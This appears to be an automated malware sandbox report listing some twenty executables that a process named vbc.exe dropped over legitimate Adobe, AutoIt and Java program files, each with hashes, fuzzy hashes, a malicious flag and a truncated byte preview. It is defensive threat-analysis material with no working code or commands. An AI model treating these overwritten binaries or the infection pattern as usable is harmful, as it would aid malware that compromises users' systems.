C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	146416
Entropy (8bit):	6.186668630643047
Encrypted:	false
SSDEEP:	3072:xBRBcmh7b1I407HN9fN8sFOE1Z5Y2966ilU9xL:xBRBcmh7bCxNr8stZ5/6Jl0B
MD5:	2924AE75A0024B943F292E853286147E
SHA1:	982BC22EF24A43D1805B8841F12E2DAC61D8CCE0
SHA-256:	FC58C6B9775817D00B4AC26FE65CE98DC79FC63DDFBDCA7E45C2A82AD5B03D12
SHA-512:	891D810B0DD41636593C76AB7F0462169438832A7AA3B2A53497AC92EAD351DB636D8466BFFC3EE3BCB7FCE5737CAD5980D1197C904ED203D882C9304DC2AC06
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	285168
Entropy (8bit):	6.013268670758781
Encrypted:	false
SSDEEP:	6144:xBRBcmh7bCA1UKupTu8ffMb0/GxsZfcJtqQ1UBZ6g:xBzcmhiVK+HMYcytZh
MD5:	B2183559E20026E015FC4356AE980ADA
SHA1:	48D9AADF3D190C498278DB3023CBA8E5DFD7B774
SHA-256:	72E622A4FA3EB8EAFBE2B855084DF00E155FA6F4C0065F3F753265DD5A7E1301
SHA-512:	896B7C94C786A9B5724AEB7CAF0290949E9F09ECE4C46D30B04947B070B7A93126155EE3EC1EE9A79EE126202E8CA42E5B504735DE042C9015CB41C0B1A8F38B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	95216
Entropy (8bit):	5.8242106433355945
Encrypted:	false
SSDEEP:	1536:xBR2ucOhDh7uIhzVCbd56fCxU6QeSnQma4S6w8MghW4wNlu9HQIXsW/44:xBRBcmh7b1I4S6w8oFlKwW//
MD5:	D6359D433773C13ACBA694EA420E13CB
SHA1:	024E46DE17C4090D679CA3DE8A4920D96B430858
SHA-256:	46946BED05AB6DD39B45339EED1FB8CACA745F1F01456A86EA83BA0AB7C78058
SHA-512:	482276980BBB544124CAEC2385E35D2B1409547C23DF832B409B016C04D7B9259654E1227EFD64E9363E874CDD0FA2F666665949E8E340E3BA357348D2CC7B5E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	151536
Entropy (8bit):	5.91737965915532
Encrypted:	false
SSDEEP:	3072:xBRBcmh7b1I4G6l8TRpR+EMucyaGoS43IIJNdS3UA:xBRBcmh7bCj6l8aGo/3VL4kA
MD5:	3821CD02E6256476A58C785B5CE995F0
SHA1:	E33626600A8302B1F6A190753C4FC7EBC4A3BB83
SHA-256:	B9804F7263517B591641B2F50878DC6A8E71394E589CE240084654079B473942
SHA-512:	D319D3A314E45ABA48624A20D2652AF82EF585B3E4A764E9797178E78371B084CF50A581568A265F0F00ED7A82E3746A56FBA76CBAF098B5ED25812126410B77
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\AutoIt3\Au3Check.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	237376
Entropy (8bit):	6.059929089546415
Encrypted:	false
SSDEEP:	3072:xBRBcmh7b1I40pzjBiXCPVdwQWEtP+N+WYPwmnDx5T4XTbCAqfTGbQ7rBRAAV8Yk:xBRBcmh7bCFxjBxFPQ8TjRAyrvAU/H0z
MD5:	319A23E142AE738E66D9A56013C1F8AC
SHA1:	098EDD530DB8666BBE0869161AD1C5DC3298B23D
SHA-256:	D4ADAF9ECCC0115B99A3608C241C0B0B1D3F9E989734AA605B81C0E9D48D9D2D
SHA-512:	BC05991032653C4D46047619685AFACA5936010AAE5888AF7057F8D7DE6D3DBBB952A1FD4754815BD1FB8B610A847B2F2251572181E20D88C06E967F0E320165
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\AutoIt3\Au3Info.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	249664
Entropy (8bit):	6.946923791900388
Encrypted:	false
SSDEEP:	6144:xBRBcmh7bCh5tCXtpY7fLTj3+Fnk2yO6Zrao:xBzcmhiztymff2j6Bao
MD5:	BE68219C47ADB6EE6E433E818BA4A946
SHA1:	CC61125D9D2EE5DE63EEC38872049176F52A1543
SHA-256:	B284A5676AC1B0747B972F6120B14D1DBF80CBBEA58B108EA3D7BBB5323A4F38
SHA-512:	605770E05BC96CF8B6D0DE6C00D95902F22302E8B1BC589318EE4982D12802ADAF99AB31EA51E0E7EC13673FA27C62D73DE07DE59B3AFE195738D38542524C34
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	269632
Entropy (8bit):	6.729514821721348
Encrypted:	false
SSDEEP:	6144:xBRBcmh7bCZTOfZdmFDNSRaOApY7fLTj3+Fnk2yOiKaK:xBzcmhiECjmff2jp5
MD5:	46F4A36961213A45AB925C33A05C978B
SHA1:	AA040EEFAE64E148FF6566F322E78B6F619222FD
SHA-256:	134D016043F5362FE02C406D2A747663E6DCA81AEF63A1202E4040E8CA27C803
SHA-512:	B0D0EC837334ABB380929309BE111AB61B1DAA33353C0D112157C33D5FD623477EF5E24CF648FF923E59A3538843895F8CCC4162C1563BCD2F454B954F600DD4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1433400
Entropy (8bit):	7.530186160074501
Encrypted:	false
SSDEEP:	24576:xBomhiBmTiPaj09O2jInFqpL6LqQOn6hyXEkImN5zVv3J4bD71Q51j:xBom8U4q2jqcpGen6e9zVvZUDZ6
MD5:	A9F3F01EF042FD34FB5023C6793183E2
SHA1:	CAC0824DF3ED0F85A0416A342FA402DE3A9F9585
SHA-256:	3B875A3EE1AB629D2AFEC5163A70A94736623B67BD87C935602B2F86AA1D787C
SHA-512:	6B43DCED0A78E4E7CD9C6050760632AF4F75AA3381C8AF875FCD2B1424A60D6C7D1B69B8DCD13EEE14F6EDD5CF3DF4FBA59CDD603CAA98008EFEA8A91E4DDC55
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1474872
Entropy (8bit):	7.460788900276898
Encrypted:	false
SSDEEP:	24576:xBomhiABCnx+6TiPaj09O2jInFqpL6LqQOn6hyXEkImN5zVv3J4bD71Q51LluvoL:xBom8Auxt4q2jqcpGen6e9zVvZUDZDs
MD5:	A2E6D5F7A6D15DF33AA915641A9BE062
SHA1:	9F4C01C1FB0E66B75784D06D957E1DCEBF4C9E47
SHA-256:	BC4754C2E72EB0C14A1283409585FE19723E47F0EA1D0648F2759EBDA33EE11D
SHA-512:	9FDD8A03EDD52E2106DA503C46BC8768B7470453CAF2931C0F4D686D38741BE5CD62F4E2DF42EF045B122008134A99B95FECC7017455118D1DA9906E44055E22
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	346624
Entropy (8bit):	7.8386038327894605
Encrypted:	false
SSDEEP:	6144:xBRBcmh7bC/pXDXz7yIrozs0WuNd3ojusBdgnNW6r4F53ttuGENGFdVCLEYnPO1u:xBzcmhi/9zGImAjJdcH4j3ttzFdVCLNT
MD5:	B9ABE2A2108F07C44E097AC16463932B
SHA1:	9A358780B63397F5D1624BFFC893B64BB6B36DBE
SHA-256:	DA37F3C405FBEABB1CD59385EFB69C222DB2433EDDB07EDDEAD430CD5DDE4ED9
SHA-512:	7216CEB83D16E57C9DABD5E8BD4C63B0543C4773EF36E6E816AB773C3A32D32B0C72DFB9EEB18E064850F90DC16748DBC7750E158FF8375A7DF1251EDD35DBA7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	159024
Entropy (8bit):	5.8879830434759794
Encrypted:	false
SSDEEP:	3072:xBRBcmh7b1I4MR0L5hQCbIJqC3CJyoDjyYyAwBvm5:xBRBcmh7bCGgLk1wBv8
MD5:	ECD94FCC6D56831F2FCE27E7A694BE31
SHA1:	43A695E23EC578EF70CC347F57617175B30831AD
SHA-256:	3ABC77EEB5EE9344F504C287472541063829B3BE033E67740C9E0A440BC19085
SHA-512:	445FAF803505A522BF14EAC39B2BF69BFD6A4DC8C56D35BF36B44FE59DCD545FA0B854C7384F316ED3956CD0A7E651773A6EB8AA2A5E43C32AE7E033728883C2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1099568
Entropy (8bit):	6.555782589302632
Encrypted:	false
SSDEEP:	24576:xBomhiyPc7GOdS64gviAgdj8phaOv2pyCLJ1KkaZT9P6i:xBom8awdZ4gviAgdj8pRIy+taTPL
MD5:	6020F42AAF9791FFFFD65C440F0CFD35
SHA1:	B15B1457744BCC9A166F44CABEBCB58E3C7FE3D9
SHA-256:	3A6CDAE764261CCCAD36A5174DF874D1119E8758F59ED214B71168F148F37597
SHA-512:	9698D2D63723014B2752518FE3B0FAE01E780A6BAF4621270595DD3B8D09A659CE24F67A616F8C8BCDA3F187F0DD7030AD1036465F36F599DA8F82E7176FA04A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1297920
Entropy (8bit):	6.6820299143831035
Encrypted:	false
SSDEEP:	24576:xBomhiG4iUKHpTypewTelai7YGKfoTvOTaTvfTXfBxr8R95E/jKQvVj4YpdjYY0K:xBom8GoKJTypekiPKQTvOTaTfjBxr8RA
MD5:	A65B4C4FE53E0288A0CE3DB181AFB07B
SHA1:	1EF4A2335A827D4224E3C5856C4F85F30CDBEF7F
SHA-256:	4DC491B891BE8894DBA0547579757E1D5C07BBE96909F345904E80911094614E
SHA-512:	94C213B369731056A176B3385695ACE88A7FB1A62C0AE59DC59D5C56F1EE28A565A3CE26190F67EEB1576E9ECF97120958A8EFD1B34A4D04E82D9CC66CA178C0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\AutoIt3\Uninstall.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	107895
Entropy (8bit):	6.479071003492727
Encrypted:	false
SSDEEP:	3072:xBRBcmh7b1I4pCrZe8LouxkZuTXJjCryH:xBRBcmh7bCYCrZePSlCr6
MD5:	916C6CA3620EFD58BDE47672D32EC5AC
SHA1:	3C88FFC8BD804760E8DE991A5154FCD2EF8220B4
SHA-256:	F6157E38E76ED813F8B68EE50C42E8B021F3BDB47DA538FACF85678E8F7766AE
SHA-512:	4A570ECC17E2C7B5B0AE64571DADD3CFE1C463FB7260C6245036EF606688213975567445D0026877D70A9308DA22F9F19D2189CD6A3B54C5CC448CBE89BE90FF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1377872
Entropy (8bit):	5.966250792638535
Encrypted:	false
SSDEEP:	24576:xBomhiUKp/J0tHT1dzgH1+xJPL95ArkSxoc1/Kp:xBom8j/sLzk1+x59Oyc1/E
MD5:	45C14CBDB7C58C390BC8933FFCB540DE
SHA1:	7301ADF06512E74F1BB07D1252F4A87F7EDB6B28
SHA-256:	666487CFFFB2FA2D8C1A921E265EAED49AE8C83638A662732E9E0CF5278A7683
SHA-512:	CBE4207FC565BEDC45072539B70A13F34D08C402283B345E685504D773E0F0759BAFDEEE2BF26895E571F966A280082C6E722363535A76691B781E3E6232BC4F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	437856
Entropy (8bit):	6.392531319620515
Encrypted:	false
SSDEEP:	6144:xBRBcmh7bCpJ2gHC0BzwUd9KAbTuWY/ejqrBPN2leSp+4NQFprg4J8uVtgGA:xBzcmhijR1OAHuWYmjqrBPI5pZErgGVW
MD5:	0AE66B7CA4509F9DDD45AE16813E9D6D
SHA1:	0092FAC2E457EE795F9E94935DEE8DC3542BCC59
SHA-256:	4147E39FA4C74F3A6A16441BD99DF539637216F2B70AA2DC80CCB4AF137D938A
SHA-512:	17AB43DC27FC12AE7D4FB380674E5BC1E253EFFD0047EB32E958ABB9DFF0A4BD1BE29F40ECBA533081AD0719A45066E8F4101483572F009D7BEAF06047CD216F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	211016
Entropy (8bit):	6.354464722986062
Encrypted:	false
SSDEEP:	6144:xBRBcmh7bCVGzdZcEAMzhubvjkYzHlB33485GXJEg:xBzcmhiVGzdZcEAMubvjkYL34LJJ
MD5:	CBA020718AEFC3FD9338F0B2B0983E46
SHA1:	764F0200044F1BDF5C2D982B3CEDA8A7C939638F
SHA-256:	BE0DC63FAA8FB0AC86D07C2B8C9A79CF09CF4B8BBAC73E346D0804C44A6DDEAF
SHA-512:	0AC1A72EEEA64076071E06D7333BB2F16677444CBB82DE3AE9ADA79C6B0B8704624824CA4AD7828AD3CEA7C598A2E3F768D7D0929BE2562B9D794AB66D4AE5D2
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	470040
Entropy (8bit):	6.528013604787764
Encrypted:	false
SSDEEP:	12288:xBzcmhiyDW1cHGIl0kSm+A/MHIK0W1lVTshO2Y0krEBdCiS:xBomhiyDW1c/n/EI61lVTnd0krEBdCiS
MD5:	FA9D1BB3EB5792C295E995F5D56FFDA3
SHA1:	292062F95E6D40E44600DF42A7EABF3BD567AF86
SHA-256:	029E55A53F7832C7BC672D2D9CFC923946BD56FBBB6453171EB5379709C79FD5
SHA-512:	D8793175204A18E109611D600FD82EEBFB85A0A220BF55C507A9C5312D05E53F6561CA471B927AB2BFB57515A2BE00D49D437E3A3190829C424C7E57953D0217
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	967704
Entropy (8bit):	6.447978352803487
Encrypted:	false
SSDEEP:	24576:xBomhizREB9ccSBdJZbBr+RYhwASiTDNPxxilcltY8:xBom82ccS3D8qqMTFxQcl68
MD5:	0202519D9709554851EA50150E4A2F48
SHA1:	09B91C1FFA356DC6722872056095EB7D26546B6D
SHA-256:	847CFAF3A92A12F9A1DF05CF3B4B0568E5833D2D17BB42BB9374D3DB9D64C76A
SHA-512:	7071FFF615E4A638D2124B52EDCF8BA29BE6B83B6B196B943444B842CA4B2999D94AE2819C59520248976567C8661CE58658DA5A18591581E582DEE424AA9B8C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

